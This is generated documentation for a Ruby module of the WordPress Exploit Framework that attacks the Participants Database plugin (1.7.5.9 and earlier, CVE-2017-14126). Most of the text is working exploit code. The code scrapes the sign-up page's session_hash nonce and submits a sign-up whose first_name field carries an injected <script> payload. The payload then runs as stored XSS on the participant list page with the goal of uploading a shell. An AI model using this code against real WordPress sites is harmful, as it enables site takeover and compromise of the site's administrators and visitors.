class Wpxf::Exploit::ParticipantsDatabaseV1759XssShellUpload

Attributes

session_hash[RW]

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Participants Database <= 1.7.5.9 XSS Shell Upload',
    author: [
      'Benjamin Lim', # Vulnerability discovery
      'rastating'     # WPXF module
    ],
    references: [
      ['CVE', '2017-14126'],
      ['WPVDB', '8896']
    ],
    date: 'Sep 06 2017'
  )

  register_options([
    StringOption.new(
      name: 'sign_up_path',
      desc: 'The relative path of the Participants Database sign up page',
      required: true
    )
  ])
end

Public Instance Methods

before_store() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 48
def before_store
  self.session_hash = fetch_nonce

  if session_hash.nil?
    emit_error 'Failed to retrieve session hash / nonce'
    return false
  end

  true
end
check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 31
def check
  check_plugin_version_from_readme('participants-database', '1.7.5.10')
end
fetch_nonce() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 43
def fetch_nonce
  res = execute_get_request(url: sign_up_url)
  return res.body[/name="session_hash"\s+type="hidden"\s+value="([a-z0-9]+)"/i, 1] if res && res.code == 200
end
sign_up_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 39
def sign_up_url
  normalize_uri(full_uri, datastore['sign_up_path'])
end
store_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 59
def store_script
  execute_post_request(
    url: sign_up_url,
    body: {
      'action' => 'signup',
      'subsource' => 'participants-database',
      'shortcode_page=' => datastore['sign_up_path'],
      'thanks_page' => datastore['sign_up_path'],
      'instance_index' => '2',
      'pdb_data_keys' => '1.2.9.10',
      'session_hash' => session_hash,
      'first_name' => "<script>#{xss_include_script}</script>#{Wpxf::Utility::Text.rand_alpha(6)}",
      'last_name' => Wpxf::Utility::Text.rand_alpha(6),
      'email' => Wpxf::Utility::Text.rand_email,
      'mailing_list' => 'No',
      'submit_button' => 'Submit'
    }
  )
end
vulnerable_page() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 35
def vulnerable_page
  'the page containing the participant list'
end